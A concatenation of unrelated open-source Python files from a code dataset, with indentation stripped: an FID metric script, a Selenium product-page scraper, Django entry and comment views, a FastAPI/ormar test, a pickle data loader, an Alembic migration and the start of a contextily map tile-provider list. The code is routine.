from tqdm import tqdm
import pathlib
from scipy import linalg
import tensorflow as tf
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def check_or_download_inception(inception_path):
''' Checks if the path to the inception file is valid, or downloads
the file if it is not present. '''
INCEPTION_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
if inception_path is None:
inception_path = '/tmp'
inception_path = pathlib.Path(inception_path)
model_file = inception_path / 'classify_image_graph_def.pb'
if not model_file.exists():
print("Downloading Inception model")
from urllib import request
import tarfile
fn, _ = request.urlretrieve(INCEPTION_URL)
with tarfile.open(fn, mode='r') as f:
f.extract('classify_image_graph_def.pb', str(model_file.parent))
return str(model_file)
def create_inception_graph(pth):
"""Creates a graph from saved GraphDef file."""
# Creates graph from saved graph_def.pb.
with tf.io.gfile.GFile(pth, 'rb') as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='FID_Inception_Net')
def calculate_activation_statistics(images,
sess,
batch_size=50,
verbose=False):
"""Calculation of the statistics used by the FID.
Params:
-- images : Numpy array of dimension (n_images, hi, wi, 3). The values
must lie between 0 and 255.
-- sess : current session
-- batch_size : the images numpy array is split into batches with batch size
batch_size. A reasonable batch size depends on the available hardware.
-- verbose : If set to True and parameter out_step is given, the number of calculated
batches is reported.
Returns:
-- mu : The mean over samples of the activations of the pool_3 layer of
the incption model.
-- sigma : The covariance matrix of the activations of the pool_3 layer of
the incption model.
"""
act = get_activations(images, sess, batch_size, verbose)
mu = np.mean(act, axis=0)
sigma = np.cov(act, rowvar=False)
return mu, sigma
# code for handling inception net derived from
# https://github.com/openai/improved-gan/blob/master/inception_score/model.py
def _get_inception_layer(sess):
"""Prepares inception net for batched usage and returns pool_3 layer. """
layername = 'FID_Inception_Net/pool_3:0'
pool3 = sess.graph.get_tensor_by_name(layername)
ops = pool3.graph.get_operations()
for op_idx, op in enumerate(ops):
for o in op.outputs:
shape = o.get_shape()
if shape._dims != []:
shape = [s.value for s in shape]
new_shape = []
for j, s in enumerate(shape):
if s == 1 and j == 0:
new_shape.append(None)
else:
new_shape.append(s)
o.__dict__['_shape_val'] = tf.TensorShape(new_shape)
return pool3
# -------------------------------------------------------------------------------
def get_activations(images, sess, batch_size=200, verbose=False):
"""Calculates the activations of the pool_3 layer for all images.
Params:
-- images : Numpy array of dimension (n_images, hi, wi, 3). The values
must lie between 0 and 256.
-- sess : current session
-- batch_size : the images numpy array is split into batches with batch size
batch_size. A reasonable batch size depends on the disposable hardware.
-- verbose : If set to True and parameter out_step is given, the number of calculated
batches is reported.
Returns:
-- A numpy array of dimension (num images, 2048) that contains the
activations of the given tensor when feeding inception with the query tensor.
"""
inception_layer = _get_inception_layer(sess)
n_images = images.shape[0]
if batch_size > n_images:
print(
"warning: batch size is bigger than the data size. setting batch size to data size"
)
batch_size = n_images
n_batches = n_images // batch_size
pred_arr = np.empty((n_images, 2048))
for i in tqdm(range(n_batches)):
if verbose:
print("\rPropagating batch %d/%d" % (i + 1, n_batches),
end="",
flush=True)
start = i * batch_size
if start + batch_size < n_images:
end = start + batch_size
else:
end = n_images
batch = images[start:end]
pred = sess.run(inception_layer,
{'FID_Inception_Net/ExpandDims:0': batch})
pred_arr[start:end] = pred.reshape(batch_size, -1)
if verbose:
print(" done")
return pred_arr
# -------------------------------------------------------------------------------
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
"""Numpy implementation of the Frechet Distance.
The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
and X_2 ~ N(mu_2, C_2) is
d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).
Stable version by <NAME>.
Params:
-- mu1 : Numpy array containing the activations of the pool_3 layer of the
inception net ( like returned by the function 'get_predictions')
for generated samples.
-- mu2 : The sample mean over activations of the pool_3 layer, precalcualted
on an representive data set.
-- sigma1: The covariance matrix over activations of the pool_3 layer for
generated samples.
-- sigma2: The covariance matrix over activations of the pool_3 layer,
precalcualted on an representive data set.
Returns:
-- : The Frechet Distance.
"""
mu1 = np.atleast_1d(mu1)
mu2 = np.atleast_1d(mu2)
sigma1 = np.atleast_2d(sigma1)
sigma2 = np.atleast_2d(sigma2)
assert mu1.shape == mu2.shape, "Training and test mean vectors have different lengths"
assert sigma1.shape == sigma2.shape, "Training and test covariances have different dimensions"
diff = mu1 - mu2
# product might be almost singular
covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
if not np.isfinite(covmean).all():
msg = "fid calculation produces singular product; adding %s to diagonal of cov estimates" % eps
warnings.warn(msg)
offset = np.eye(sigma1.shape[0]) * eps
covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset))
# numerical error might give slight imaginary component
if np.iscomplexobj(covmean):
if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3):
m = np.max(np.abs(covmean.imag))
raise ValueError("Imaginary component {}".format(m))
covmean = covmean.real
tr_covmean = np.trace(covmean)
return diff.dot(diff) + np.trace(sigma1) + np.trace(
sigma2) - 2 * tr_covmean
def pt_to_np(imgs):
'''normalizes pytorch image in [-1, 1] to [0, 255]'''
normalized = [((img / 2 + 0.5) * 255).clamp(0, 255) for img in imgs]
return np.array([img.permute(1, 2, 0).numpy() for img in normalized])
def compute_fid_given_images(fake_images, real_images):
'''requires that the image batches are numpy format, normalized to 0, 255'''
inception_path = check_or_download_inception(None)
create_inception_graph(inception_path)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if isinstance(fake_images, tuple):
m1, s1 = fake_images
else:
m1, s1 = calculate_activation_statistics(fake_images, sess)
if isinstance(real_images, tuple):
m2, s2 = real_images
else:
m2, s2 = calculate_activation_statistics(real_images, sess)
return calculate_frechet_distance(m1, s1, m2, s2)
def compute_fid_given_path(path):
with np.load(path) as data:
fake_imgs = data['fake']
real_imgs = data['real']
return compute_fid_given_images(fake_imgs, real_imgs)
def load_from_path(source):
root = '/data/vision/torralba/ganprojects/placesgan/tracer/utils/fid_stats/'
path = os.path.join(root, f'{source}_stats.npz')
if os.path.exists(path):
print('Loading statistics from ', path)
with np.load(path) as data:
return data['m'], data['s']
else:
print("Stats not found in path", path)
exit()
def compute_fid(source1, source2):
if isinstance(source1, str):
source1 = load_from_path(source1)
if isinstance(source1, torch.Tensor):
source1 = pt_to_np(source1)
if isinstance(source2, str):
source2 = load_from_path(source2)
if isinstance(source2, torch.Tensor):
source2 = pt_to_np(source2)
return compute_fid_given_images(source1, source2)
if __name__ == '__main__':
import argparse
from PIL import Image
from torchvision import transforms
parser = argparse.ArgumentParser()
parser.add_argument('--source')
parser.add_argument('--target')
args = parser.parse_args()
transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
images1 = []
for file_name in tqdm(os.listdir(args.source)):
if file_name.lower().endswith(('.png', 'jpeg', '.jpg')):
path = os.path.join(args.source, file_name)
images1.append(transform(Image.open(path).convert('RGB')))
images1 = torch.stack(images1)
images2 = []
for file_name in tqdm(os.listdir(args.source)):
if file_name.lower().endswith(('.png', 'jpeg', '.jpg')):
path = os.path.join(args.source, file_name)
images2.append(transform(Image.open(path).convert('RGB')))
images2 = torch.stack(images2)
result = compute_fid(images1, images2)
print(result)
with open('fid_results.txt', 'a+') as f:
f.write(args.source + args.target + ':\n')
f.write(str(result) + '\n')
|
__scraping__/oldnavy.gap.com/main.py | whitmans-max/python-examples | 140 | 12770133 | #!/usr/bin/env python3
# date: 2016.11.24 (update: 2020.06.13)
# https://stackoverflow.com/questions/40777864/retrieving-all-information-from-page-beautifulsoup/
from selenium import webdriver
from bs4 import BeautifulSoup
import time
# --- get page ---
link = 'http://oldnavy.gap.com/browse/category.do?cid=1035712&sop=true'
#driver = webdriver.PhantomJS() # deprecated
driver = webdriver.Firefox()
driver.get(link)
time.sleep(3)
# --- scrolling ---
#size = driver.get_window_size()
#print(size)
#window_height = size['height']
#print('window_height:', window_height) # webpage + toolbars + border
# https://stackoverflow.com/questions/1248081/how-to-get-the-browser-viewport-dimensions
# this may give too big value because it includes scrollbar's height (ie. 962 = 950+22)
#viewport_height = driver.execute_script('return window.innerHeight;')
#print('viewport_height:', viewport_height)
# this gives correct value without scrollbar (ie. 950)
viewport_height = driver.execute_script('return document.documentElement.clientHeight;')
print('viewport_height:', viewport_height)
y = 0 # position to scroll
# at start it has to bigger then `y` to run `while y < page_height:`
page_height = 1
#page_height = driver.execute_script('return document.body.scrollHeight;')
while y < page_height:
y += viewport_height # move only visible height
print('y:', y, 'page_height:', page_height)
# scroll
driver.execute_script(f'window.scrollTo(0, {y});')
# browser may need time to update page
time.sleep(0.5)
# get page height (it can change when JavaScript adds elements)
page_height = driver.execute_script('return document.body.scrollHeight;')
# --- get data with BeautifulSoup ---
base_url = 'http://www.oldnavy.com'
html = driver.page_source
soup = BeautifulSoup(html, 'html5lib')
all_divs = soup.find_all('div', class_='product-card') # new layout
print('len(all_divs):', len(all_divs))
#for div in all_divs:
# link = div.find('a')
# print(link.text)
# print(base_url + link['href'])
# --- get data with Selenium ---
all_products = driver.find_elements_by_class_name('product-card')
print('len(all_products):', len(all_products))
for product in all_products:
link = product.find_element_by_tag_name('a')
print(link.text)
# print(base_url + link['href'])
|
dictionary/views/edit.py | ankitgc1/django-sozluk-master | 248 | 12770142 | from django.contrib import messages as notifications
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.db.models import F, Q
from django.db.models.functions import Coalesce
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect
from django.urls import reverse, reverse_lazy
from django.utils import timezone
from django.utils.translation import gettext, gettext_lazy as _
from django.views.generic import CreateView, FormView, UpdateView
from dictionary.forms.edit import EntryForm, PreferencesForm
from dictionary.models import Author, Comment, Entry, Topic
from dictionary.utils import time_threshold
class UserPreferences(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = Author
form_class = PreferencesForm
template_name = "dictionary/user/preferences/index.html"
success_message = _("settings are saved, dear")
success_url = reverse_lazy("user_preferences")
def get_object(self, queryset=None):
return self.request.user
def form_invalid(self, form):
notifications.error(self.request, gettext("we couldn't handle your request. try again later."))
return super().form_invalid(form)
class EntryCreateMixin:
model = Entry
form_class = EntryForm
def form_valid(self, form):
"""
User sent new entry, whose topic may or may not be existent. If topic
exists, adds the entry and redirects to the entry permalink, otherwise
the topic is created if the title is valid. Entry.save() sets created_by
field of the topic.
"""
draft_pk = self.request.POST.get("pub_draft_pk", "")
publishing_draft = draft_pk.isdigit()
if (not publishing_draft) and (self.topic.exists and self.topic.is_banned):
# Cannot check is_banned before checking its existence.
notifications.error(self.request, _("we couldn't handle your request. try again later."))
return self.form_invalid(form)
status = self.request.user.entry_publishable_status
if status is not None:
notifications.error(self.request, status, extra_tags="persistent")
if publishing_draft:
return redirect(reverse("entry_update", kwargs={"pk": int(draft_pk)}))
return self.form_invalid(form)
if publishing_draft:
try:
entry = Entry.objects_all.get(
pk=int(draft_pk), is_draft=True, author=self.request.user, topic__is_banned=False
)
entry.content = form.cleaned_data["content"]
entry.is_draft = False
entry.date_created = timezone.now()
entry.date_edited = None
except Entry.DoesNotExist:
notifications.error(self.request, _("we couldn't handle your request. try again later."))
return self.form_invalid(form)
else:
# Creating a brand new entry.
entry = form.save(commit=False)
entry.author = self.request.user
if self.topic.exists:
entry.topic = self.topic
else:
if not self.topic.valid:
notifications.error(self.request, _("curses to such a topic anyway."), extra_tags="persistent")
return self.form_invalid(form)
entry.topic = Topic.objects.create_topic(title=self.topic.title)
entry.save()
notifications.info(self.request, _("the entry was successfully launched into stratosphere"))
return redirect(reverse("entry-permalink", kwargs={"entry_id": entry.id}))
def form_invalid(self, form):
if form.errors:
for err in form.errors["content"]:
notifications.error(self.request, err, extra_tags="persistent")
return super().form_invalid(form)
class EntryCreate(LoginRequiredMixin, EntryCreateMixin, FormView):
template_name = "dictionary/edit/entry_create.html"
def dispatch(self, request, *args, **kwargs):
self.extra_context = {"title": self.request.POST.get("title", "")}
return super().dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["recent_drafts"] = (
Entry.objects_all.filter(
Q(date_created__gte=time_threshold(hours=24)) | Q(date_edited__gte=time_threshold(hours=24)),
is_draft=True,
author=self.request.user,
)
.select_related("topic")
.only("topic__title", "date_created", "date_edited")
.alias(last_edited=Coalesce(F("date_edited"), F("date_created")))
.order_by("-last_edited")[:5]
)
return context
def form_valid(self, form):
if not self.request.POST.get("pub_draft_pk", "").isdigit():
# Topic object is only required if not publishing a draft.
self.topic = Topic.objects.get_or_pseudo(unicode_string=self.extra_context.get("title")) # noqa
return super().form_valid(form)
class EntryUpdate(LoginRequiredMixin, UpdateView):
model = Entry
form_class = EntryForm
template_name = "dictionary/edit/entry_update.html"
context_object_name = "entry"
def form_valid(self, form):
entry = form.save(commit=False)
if self.request.user.is_suspended or entry.topic.is_banned:
notifications.error(self.request, gettext("you lack the required permissions."))
return super().form_invalid(form)
if entry.is_draft:
status = self.request.user.entry_publishable_status
if status is not None:
notifications.error(self.request, status, extra_tags="persistent")
return super().form_invalid(form)
entry.is_draft = False
entry.date_created = timezone.now()
entry.date_edited = None
notifications.info(self.request, gettext("the entry was successfully launched into stratosphere"))
else:
entry.date_edited = timezone.now()
return super().form_valid(form)
def form_invalid(self, form):
for error in form.errors["content"]:
notifications.error(self.request, error)
return super().form_invalid(form)
def get_queryset(self):
return Entry.objects_all.filter(author=self.request.user)
class CommentMixin(LoginRequiredMixin, SuccessMessageMixin):
model = Comment
fields = ("content",)
template_name = "dictionary/edit/comment_form.html"
def form_invalid(self, form):
for error in form.errors["content"]:
notifications.error(self.request, error)
return super().form_invalid(form)
class CommentCreate(CommentMixin, CreateView):
success_message = _("the comment was successfully launched into stratosphere")
entry = None
def dispatch(self, request, *args, **kwargs):
self.entry = get_object_or_404(Entry.objects_published, pk=self.kwargs.get("pk"))
if not (
request.user.has_perm("dictionary.can_comment") and self.entry.topic.is_ama and request.user.is_accessible
):
raise Http404
return super().dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["entry"] = self.entry
return context
def form_valid(self, form):
comment = form.save(commit=False)
comment.author = self.request.user
comment.entry = self.entry
comment.save()
return super().form_valid(form)
class CommentUpdate(CommentMixin, UpdateView):
success_message = _("the comment has been updated")
def get_object(self, queryset=None):
return get_object_or_404(Comment, pk=self.kwargs.get(self.pk_url_kwarg), author=self.request.user)
def form_valid(self, form):
if self.request.POST.get("delete"):
self.object.delete()
notifications.success(self.request, gettext("the comment has been deleted"))
return redirect(self.object.entry.get_absolute_url())
if not self.request.user.is_accessible:
notifications.error(
self.request, gettext("you lack the permissions to edit this comment. you might as well delete it?")
)
return self.form_invalid(form)
comment = form.save(commit=False)
comment.date_edited = timezone.now()
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["entry"] = self.object.entry
context["updating"] = True
return context
|
bits_wilp/isPalindrome.py | deepak5998/Py | 726 | 12770163 | def isPalindrome(str):
result = False
if str == str[::-1]:
result = True
return result
print("Please enter a string: ")
x = input()
flag = isPalindrome(x)
if flag:
print(x, "is a Palindrome")
else:
print(x, "is NOT a Palindrome")
|
tests/test_fastapi/test_more_reallife_fastapi.py | ivangirko/ormar | 905 | 12770172 | <filename>tests/test_fastapi/test_more_reallife_fastapi.py
import asyncio
from typing import List, Optional
import databases
import pytest
import sqlalchemy
from fastapi import FastAPI
from starlette.testclient import TestClient
import ormar
from tests.settings import DATABASE_URL
app = FastAPI()
metadata = sqlalchemy.MetaData()
database = databases.Database(DATABASE_URL, force_rollback=True)
app.state.database = database
@app.on_event("startup")
async def startup() -> None:
database_ = app.state.database
if not database_.is_connected:
await database_.connect()
@app.on_event("shutdown")
async def shutdown() -> None:
database_ = app.state.database
if database_.is_connected:
await database_.disconnect()
class Category(ormar.Model):
class Meta:
tablename = "categories"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
class Item(ormar.Model):
class Meta:
tablename = "items"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
category: Optional[Category] = ormar.ForeignKey(Category, nullable=True)
@pytest.fixture(autouse=True, scope="module")
def create_test_database():
engine = sqlalchemy.create_engine(DATABASE_URL)
metadata.create_all(engine)
yield
metadata.drop_all(engine)
@app.get("/items/", response_model=List[Item])
async def get_items():
items = await Item.objects.select_related("category").all()
return items
@app.get("/items/raw/", response_model=List[Item])
async def get_raw_items():
items = await Item.objects.all()
return items
@app.post("/items/", response_model=Item)
async def create_item(item: Item):
await item.save()
return item
@app.post("/categories/", response_model=Category)
async def create_category(category: Category):
await category.save()
return category
@app.get("/items/{item_id}")
async def get_item(item_id: int):
item = await Item.objects.get(pk=item_id)
return item
@app.put("/items/{item_id}")
async def update_item(item_id: int, item: Item):
item_db = await Item.objects.get(pk=item_id)
return await item_db.update(**item.dict())
@app.delete("/items/{item_id}")
async def delete_item(item_id: int, item: Item = None):
if item:
return {"deleted_rows": await item.delete()}
item_db = await Item.objects.get(pk=item_id)
return {"deleted_rows": await item_db.delete()}
def test_all_endpoints():
client = TestClient(app)
with client as client:
response = client.post("/categories/", json={"name": "test cat"})
category = response.json()
response = client.post(
"/items/", json={"name": "test", "id": 1, "category": category}
)
item = Item(**response.json())
assert item.pk is not None
response = client.get("/items/")
items = [Item(**item) for item in response.json()]
assert items[0] == item
item.name = "New name"
response = client.put(f"/items/{item.pk}", json=item.dict())
assert response.json() == item.dict()
response = client.get("/items/")
items = [Item(**item) for item in response.json()]
assert items[0].name == "New name"
response = client.get("/items/raw/")
items = [Item(**item) for item in response.json()]
assert items[0].name == "New name"
assert items[0].category.name is None
response = client.get(f"/items/{item.pk}")
new_item = Item(**response.json())
assert new_item == item
response = client.delete(f"/items/{item.pk}")
assert response.json().get("deleted_rows", "__UNDEFINED__") != "__UNDEFINED__"
response = client.get("/items/")
items = response.json()
assert len(items) == 0
client.post("/items/", json={"name": "test_2", "id": 2, "category": category})
response = client.get("/items/")
items = response.json()
assert len(items) == 1
item = Item(**items[0])
response = client.delete(f"/items/{item.pk}", json=item.dict())
assert response.json().get("deleted_rows", "__UNDEFINED__") != "__UNDEFINED__"
response = client.get("/docs/")
assert response.status_code == 200
|
scripts/normalization.py | ysy6868/STPF | 958 | 12770195 | #! /usr/bin/python
'''
Data Normalization
'''
from sklearn import preprocessing
def normalize(file_dataframe, cols):
'''
Data Normalization.
'''
for col in cols:
preprocessing.normalize(file_dataframe[col], \
axis=1, norm='l2', copy=False)
return file_dataframe |
veles/loader/pickles.py | AkshayJainG/veles | 1,007 | 12770208 | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 25, 2015
Loaders which get data from pickles
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import pickle
import numpy
import six
from zope.interface import implementer
from veles import error
from veles.compat import from_none
from veles.external.progressbar import ProgressBar
from veles.memory import interleave
from veles.loader.base import CLASS_NAME, Loader
from veles.loader.image import IImageLoader, COLOR_CHANNELS_MAP
from veles.loader.fullbatch import FullBatchLoader, IFullBatchLoader
from veles.loader.fullbatch_image import FullBatchImageLoader
@implementer(IFullBatchLoader)
class PicklesLoader(FullBatchLoader):
"""
Loads samples from pickles for data set.
"""
def __init__(self, workflow, **kwargs):
super(PicklesLoader, self).__init__(workflow, **kwargs)
self._test_pickles = list(kwargs.get("test_pickles", []))
self._validation_pickles = list(kwargs.get("validation_pickles", []))
self._train_pickles = list(kwargs.get("train_pickles", []))
self._pickles = (self.test_pickles, self.validation_pickles,
self.train_pickles)
@property
def test_pickles(self):
return self._test_pickles
@property
def validation_pickles(self):
return self._validation_pickles
@property
def train_pickles(self):
return self._train_pickles
def reshape(self, shape):
return shape
def transform_data(self, data):
return data
def load_data(self):
pbar = ProgressBar(maxval=sum(len(p) for p in self._pickles),
term_width=40)
self.info("Loading %d pickles...", pbar.maxval)
pbar.start()
loaded = [self.load_pickles(i, self._pickles[i], pbar)
for i in range(3)]
pbar.finish()
self.info("Initializing the arrays...")
shape = loaded[2][1][0].shape[1:]
for i in range(2):
if loaded[i][0] > 0:
shi = loaded[i][1][0].shape[1:]
if shape != shi:
raise error.BadFormatError(
"TRAIN and %s sets have the different sample shape "
"(%s vs %s)" % (CLASS_NAME[i], shape, shi))
self.create_originals(self.reshape(shape))
offsets = [0, 0]
for ds in range(3):
if loaded[ds][0] == 0:
continue
for arr in loaded[ds][1]:
self.original_data[offsets[0]:(offsets[0] + arr.shape[0])] = \
self.transform_data(arr)
offsets[0] += arr.shape[0]
for arr in loaded[ds][2]:
self.original_labels[offsets[1]:(offsets[1] + arr.shape[0])] =\
arr
offsets[1] += arr.shape[0]
def load_pickles(self, index, pickles, pbar):
unpickled = []
for pick in pickles:
try:
with open(pick, "rb") as fin:
self.debug("Loading %s...", pick)
if six.PY3:
loaded = pickle.load(fin, encoding='charmap')
else:
loaded = pickle.load(fin)
unpickled.append(loaded)
pbar.inc()
except Exception as e:
self.warning(
"Failed to load %s (part of %s set)" %
(pick, CLASS_NAME[index]))
raise from_none(e)
data = []
labels = []
for obj, pick in zip(unpickled, pickles):
if not isinstance(obj, dict):
raise TypeError(
"%s has the wrong format (part of %s set)" %
(pick, CLASS_NAME[index]))
try:
data.append(obj["data"])
labels.append(
numpy.array(obj["labels"], dtype=Loader.LABEL_DTYPE))
except KeyError as e:
self.error("%s has the wrong format (part of %s set)",
pick, CLASS_NAME[index])
raise from_none(e)
lengths = [0, sum(len(l) for l in labels)]
for arr in data:
lengths[0] += arr.shape[0]
if arr.shape[1:] != data[0].shape[1:]:
raise error.BadFormatError(
"Array has a different shape: expected %s, got %s"
"(%s set)" % (data[0].shape[1:],
arr.shape[1:], CLASS_NAME[index]))
if lengths[0] != lengths[1]:
raise error.BadFormatError(
"Data and labels has the different number of samples (data %d,"
" labels %d)" % lengths)
length = lengths[0]
self.class_lengths[index] = length
return length, data, labels
@implementer(IImageLoader)
class PicklesImageFullBatchLoader(PicklesLoader, FullBatchImageLoader):
MAPPING = "full_batch_pickles_image"
def __init__(self, workflow, **kwargs):
super(PicklesImageFullBatchLoader, self).__init__(workflow, **kwargs)
# Since we can not extract the color space information from pickles
# set it explicitly without any default value
self.color_space = kwargs["color_space"]
def get_image_label(self, key):
return int(self.image_labels[key])
def get_image_info(self, key):
return self.image_data[key].shape[:2], self.color_space
def get_image_data(self, key):
return self.image_data[key]
def get_keys(self, index):
offsets = [0, self.class_lengths[0],
self.class_lengths[0] + self.class_lengths[1],
self.total_samples]
self.original_shape = self.image_data.shape[1:-1]
return range(offsets[index], offsets[index + 1])
def reshape(self, shape):
if shape[0] == COLOR_CHANNELS_MAP[self.color_space]:
return shape[1:] + (shape[0],)
return shape
def transform_data(self, data):
if data.shape[1] == COLOR_CHANNELS_MAP[self.color_space]:
return interleave(data)
return data
def load_data(self):
PicklesLoader.load_data(self)
self.original_class_lengths = self.class_lengths
self.image_data = self.original_data.mem
self.original_data.mem = None
self.image_labels = self.original_labels[:]
del self.original_labels[:]
FullBatchImageLoader.load_data(self)
assert self.original_class_lengths == self.class_lengths
del self.image_data
def initialize(self, device, **kwargs):
super(PicklesImageFullBatchLoader, self).initialize(
device=device, **kwargs)
del self.image_labels
|
wyze_sdk/service/__init__.py | RebelTat/wyze-sdk | 132 | 12770220 | from .api_service import ApiServiceClient # noqa
from .auth_service import AuthServiceClient # noqa
from .earth_service import EarthServiceClient # noqa
from .ford_service import FordServiceClient # noqa
from .general_api_service import GeneralApiServiceClient # noqa
from .platform_service import PlatformServiceClient # noqa
from .scale_service import ScaleServiceClient # noqa
from .venus_service import VenusServiceClient # noqa
from .wyze_response import WyzeResponse # noqa
|
aiida/backends/sqlalchemy/migrations/versions/162b99bca4a2_drop_dbcalcstate.py | azadoks/aiida-core | 180 | 12770250 | <reponame>azadoks/aiida-core<filename>aiida/backends/sqlalchemy/migrations/versions/162b99bca4a2_drop_dbcalcstate.py
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name,no-member
"""Drop the DbCalcState table
Revision ID: <KEY>
Revises: a603da2cc809
Create Date: 2018-11-14 08:37:13.719646
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'a603da2cc809'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table('db_dbcalcstate')
def downgrade():
op.create_table(
'db_dbcalcstate', sa.Column('id', sa.INTEGER(), nullable=False),
sa.Column('dbnode_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('state', sa.VARCHAR(length=255), autoincrement=False, nullable=True),
sa.Column('time', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['dbnode_id'], ['db_dbnode.id'],
name='db_dbcalcstate_dbnode_id_fkey',
ondelete='CASCADE',
initially='DEFERRED',
deferrable=True), sa.PrimaryKeyConstraint('id', name='db_dbcalcstate_pkey'),
sa.UniqueConstraint('dbnode_id', 'state', name='db_dbcalcstate_dbnode_id_state_key')
)
|
contextily/_providers.py | jpn--/contextily | 163 | 12770282 | """
Tile providers.
This file is autogenerated! It is a python representation of the leaflet
providers defined by the leaflet-providers.js extension to Leaflet
(https://github.com/leaflet-extras/leaflet-providers).
Credit to the leaflet-providers.js project (BSD 2-Clause "Simplified" License)
and the Leaflet Providers contributors.
Generated by parse_leaflet_providers.py at 2019-08-01 from leaflet-providers
at commit 9eb968f8442ea492626c9c8f0dac8ede484e6905 (Bumped version to 1.8.0).
"""
class Bunch(dict):
"""A dict with attribute-access"""
def __getattr__(self, key):
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError(key)
def __dir__(self):
return self.keys()
class TileProvider(Bunch):
"""
A dict with attribute-access and that
can be called to update keys
"""
def __call__(self, **kwargs):
new = TileProvider(self) # takes a copy preserving the class
new.update(kwargs)
return new
providers = Bunch(
OpenStreetMap = Bunch(
Mapnik = TileProvider(
url = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors',
name = 'OpenStreetMap.Mapnik'
),
DE = TileProvider(
url = 'https://{s}.tile.openstreetmap.de/tiles/osmde/{z}/{x}/{y}.png',
max_zoom = 18,
attribution = '(C) OpenStreetMap contributors',
name = 'OpenStreetMap.DE'
),
CH = TileProvider(
url = 'https://tile.osm.ch/switzerland/{z}/{x}/{y}.png',
max_zoom = 18,
attribution = '(C) OpenStreetMap contributors',
bounds = [[45, 5], [48, 11]],
name = 'OpenStreetMap.CH'
),
France = TileProvider(
url = 'https://{s}.tile.openstreetmap.fr/osmfr/{z}/{x}/{y}.png',
max_zoom = 20,
attribution = '(C) Openstreetmap France | (C) OpenStreetMap contributors',
name = 'OpenStreetMap.France'
),
HOT = TileProvider(
url = 'https://{s}.tile.openstreetmap.fr/hot/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors, Tiles style by Humanitarian OpenStreetMap Team hosted by OpenStreetMap France',
name = 'OpenStreetMap.HOT'
),
BZH = TileProvider(
url = 'https://tile.openstreetmap.bzh/br/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors, Tiles courtesy of Breton OpenStreetMap Team',
bounds = [[46.2, -5.5], [50, 0.7]],
name = 'OpenStreetMap.BZH'
)
),
OpenSeaMap = TileProvider(
url = 'https://tiles.openseamap.org/seamark/{z}/{x}/{y}.png',
attribution = 'Map data: (C) OpenSeaMap contributors',
name = 'OpenSeaMap'
),
OpenPtMap = TileProvider(
url = 'http://openptmap.org/tiles/{z}/{x}/{y}.png',
max_zoom = 17,
attribution = 'Map data: (C) OpenPtMap contributors',
name = 'OpenPtMap'
),
OpenTopoMap = TileProvider(
url = 'https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png',
max_zoom = 17,
attribution = 'Map data: (C) OpenStreetMap contributors, SRTM | Map style: (C) OpenTopoMap (CC-BY-SA)',
name = 'OpenTopoMap'
),
OpenRailwayMap = TileProvider(
url = 'https://{s}.tiles.openrailwaymap.org/standard/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) OpenRailwayMap (CC-BY-SA)',
name = 'OpenRailwayMap'
),
OpenFireMap = TileProvider(
url = 'http://openfiremap.org/hytiles/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) OpenFireMap (CC-BY-SA)',
